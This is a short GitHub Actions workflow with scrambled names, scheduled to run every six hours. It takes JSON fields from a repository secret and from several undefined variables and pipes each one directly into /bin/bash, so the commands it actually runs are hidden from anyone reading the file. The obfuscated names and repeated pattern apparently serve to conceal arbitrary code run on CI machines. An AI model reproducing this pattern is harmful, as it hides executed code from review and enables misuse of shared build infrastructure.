name: shenjingcha4189

on:
  workflow_dispatch:
  schedule:
    - cron: '43 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: shenjingcha4189
        env:
          zmgeq8: ${{ secrets.zmgeq8 }}
        run: |
          echo $zmgeq8 | jq -r .amcq7 | /bin/bash
          echo $zkd104 | jq -r .tkpsp903 | /bin/bash
          echo $l4 | jq -r .ysz1 | /bin/bash
          echo $mb00 | jq -r .xcrda4 | /bin/bash
          echo $nwpr322 | jq -r .qlpdm04 | /bin/bash
          echo $aaw85745 | jq -r .hjgc61847 | /bin/bash
          echo $a726 | jq -r .s7284 | /bin/bash
          echo $lrddp28925 | jq -r .chwn3708 | /bin/bash

